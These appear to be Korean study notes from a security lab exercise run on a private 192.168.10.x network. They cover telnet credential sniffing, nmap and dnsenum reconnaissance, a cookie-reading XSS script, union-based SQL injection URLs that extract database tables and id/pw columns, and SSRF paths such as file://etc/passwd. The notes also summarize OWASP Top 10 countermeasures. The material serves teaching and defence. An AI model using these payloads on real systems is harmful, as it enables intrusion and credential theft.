DB 보안 구축

1.

[텔넷 서버]

yum install telnet-server

(서비스실행)
service telnet.socket restart

[방화벽설정]
firewall-cmd --permanent --add-port 23/tcp
firewall-cmd --reload
================================================

useradd sevas
passwd sevas
asd123
와이어샤크 켜진 상태에서
telnet 192.168.10.10
sevas
asd123

tcp.stream eq 1
회색 SYN,ACK follow tcp stream

ssh -l sevas 192.168.10.10
asd123
tcp.stream eq 2
회색 SYN,ACK follow tcp stream
=====================================
2-1 이미지의 웹서버의 호스트명과 ip를 찾아라
nmap -sP 192.168.10.0/24
이유 : ip와 도메인네임이 일치하는 내용이 192.168.10.60  www.korea10.com

dnsenum --dnsserver 192.168.10.60 korea10.com

2-2 해당호스트에서 열려있는 포트내용 (UDP/TCP) 20-150까지 스크린
nmap -sTU -p 20-150 192.168.10.60

2-3 해당 호스트 웹서버의 OS와, PHP버전, 어플리케이션이름을  확인하고 해당 내용 스크린
telnet 192.168.10.60 80 
==================
4-1 
192.168.10.60접속
회원가입
로그인
게시판
<script>alert ("cookie"+document.cookie) </script>
등록
들어가기

4-2 [DB]
http://192.168.10.60/board_view php?b_no=0
뒤에 복붙 'union select table_schema,table_name,1,1,1 from information_schema.tables group by (table_schema) limit 1,1--+

[TABLE]
http://192.168.10.60/board_view php?b_no=0 'union select table_schema,table_name,column_name,1,1 from information_schema.columns  where table_schema='hackmap' group by table_name limit 0,1--+

[ID/PW]
http://192.168.10.60/board_view php?b_no=0 'union select id,pw,1,1,1 from hackmap.class limit 4(여기 바꿔봐야함),1--+

 

 

 

===========================================================================================
4-3 xss 공격과 CSRF 공격의 차이와 POST와 GET의 차이는 무엇인가요?

xss는 자바스크립트가 필요하고 클라이언트에서 실행
CSRF는 자바스크립트가 아니더라도 서버의 동작원리를 사용해서 공격이 가능하고 서버에서 실행
POST는 body에서 실행
GET는 URL에 ?파라메터로 실행                                                                                                                                           

3-1 다음 내용을 보고 문제점과 개선 방안을 수행
문제점 비밀번호가 너무 짧게 되어있고 쉬운 방법으로 설정
대책: 영문숫자 10자리 영문숫자특문 조합 8자리 이상 복잡성을 가진다

3-2 애플리케이션 취약점 목록 CVE CWE OWASP에 대해서 설명
1)CVE(Commom Vulnerabilities and Exposure)
알려진 보안 취약점 목록을 정리하고 정보를 공유하는 목적

2)CWE(Commom Weakness Eunmeration)
일반적인 취약점을 열거하여 소프트웨어 취약점 유형을 정형화한 목록 소프트웨어 개발자 및 보안관계자에 제공

3)OWASP(the Open Web Application Security Project)
국제 애플리케이션 보안 위험 목록 4년마다 상위 10 개를 선점하여 발표 


3-3 OWASP top 10 (2021 기준) 3가지 외워야함

01 : Broken Access Control (접근 권한 취약점)

루트킷이나 백도어 , 관리자권한이나 자동실행과같은 취약점이 노출되면서 이를 공격자가 이용하여 악의적인 행위를 하게됨

대책 :  사용자가 권한을 벗어나 행동할 수 없도록 정책을 시행합니다.
(추가되는 관리자 권한 확인 ,권한 제한 )

A02 : Cryptographic Failures (암호화 오류)

평문 데이타 노출 Sensitive Data Exposure(민감 데이터 노출)의 명칭이 2021년 Cryptographic Failures(암호화 오류)로 변경
절한 암호화가 이루어지지 않으면 민감 데이터가 노출

대책 : 암호화 , 문서보안

A03: Injection (인젝션)

sql injection sql 쿼리문이 url 이나 인자값에 전달이 되면서 정보를 획득 

대책 : sql 문의 UNION, JOIN , SELECT 등 악의적인 행위를 할수 있는 코드를 replace해서 공백으로 바꾸는등 시큐어 코딩 진행 , 시그니처 필터

A04: Insecure Design (안전하지 않은 설계)

:웹방화벽 부재 , 가용성 부족, 자원집중, https가 아닌 http 운영 등등 누락되거나 비효율적인  제어 설계로 표현되는 다양한 취약점

대안 : 웹방화벽 설치 , 라운드로빈과 같은 부하분산이중화 , 자원의 분산화 , https 암호화 통신

A05: Security Misconfiguration (보안설정오류)

불필요한 기능이 활성화 되거나 설치되었을 때, 기본계정 및 암호화가 변경되지 않았을 때, 지나치게 상세한 오류 메세지를 노출할 때, 최신 보안기능이 비활성화 되거나 안전하지 않게 구성되었을 때 발생합니다.

대안 : directoryindex 보안설정 , 서버시그니처 제한 , 웹페이지 출력 제한 , (DNAT) 포트변환

A06: Vulnerable and Outdated Components (취약하고 오래된 요소)

취약하고 오래된 요소는 지원이 종료되었거나 오래된 버전을 사용할 때 발생합니다. 이는 애플리케이션 뿐만 아니라, DBMS, API 및 모든 구성요소 들이 포함됩니다.

대안: 프로그램 최신화 , 업데이트

A07: Identification and Authentication Failures (식별 및 인증 오류)

Broken Authentication(취약한 인증)으로 알려졌던 해당 취약점은 identification failures(식별 실패)까지 포함하여 더 넓은 범위를 포함할 수 있도록 변경되었습니다. 사용자의 신원확인, 인증 및 세션관리가 적절히 되지 않을 때 취약점이 발생할 수 있습니다.

대안 : 세션파기 , 재사용금지 , 자동 세션종료 , 비밀번호확인 절차 추가 (비밀번호확인 , OTP , recaptcha  등등)

A08: Software and Data Integrity Failures(소프트웨어 및 데이터 무결성 오류)

2021년 새로 등장한 카테고리로 무결성을 확인하지 않고 소프트웨어 업데이트, 중요 데이터 및 CI/CD 파이프라인과 관련된 가정을 하는데 중점을 둡니다.

대안 : 무결성 점검 프로세스 구현 , 직원보안교육 (체크섬 확인 )  , 검증되지 않은 프로그램 다운로드X

A09: Security Logging and Monitoring Failures (보안 로깅 및 모니터링 실패)

Insufficient Logging & Monitoring(불충분한 로깅 및 모니터링) 명칭이었던 카테고리가 Security Logging and Monitoring Failures (보안 로깅 및 모니터링 실패)로 변경되었습니다. 로깅 및 모니터링 없이는 공격활동을 인지할 수 없습니다. 이 카테고리는 진행중인 공격을 감지 및 대응하는데 도움이 됩니다.

대안 : IDS , IPS ,UTM 등 보안장비 구현

A10: Server-Side Request Forgery (서버 측 요청 위조)

2021년 새롭게 등장하였습니다. SSRF 결함은 웹 애플리케이션이
사용자가 제공한 URL의 유효성을 검사하지 않고 원격 리소스를 가져올 때마다 발생합니다.
이를 통해 공격자는 방화벽, VPN 또는 다른 유형의 네트워크 ACL(액세스 제어 목록)에 의해 보호되는 경우에도
응용 프로그램이 조작된 요청을 예기치 않은 대상으로 보내도록 강제할 수 있습니다.
Server-side Request Forgery  서버쪽에서 위조된 호출을 유도하는 공격
xss 공격과 유사하게 외부 호스트를 호출하는대신 로컬호스트를 호출하여 내부적인 공격을함
사용자의 입력값으로 URL을 받아서 처리하는 서비스의 경우 이를 이용해서 출력시킴

file://etc/passwd
http://127.0.0.1/file  등과같이 로컬에 있는 서버 자원을 사용해서
의도된 공격행위를 함

대안 : 127.0.0.1 이나 localhost같은 로컬호스트 요청 부분 필터링 , 허가된 url및 호스트만 사용가능 , DNAT을통한 망분리

3-4 최신 IT 보안위협에 대응하기 위해서 가장 기본적으로  기업에서 취해야하는 해동 3가지
백신 사용
최신업데이트 프로그램사용
보안교육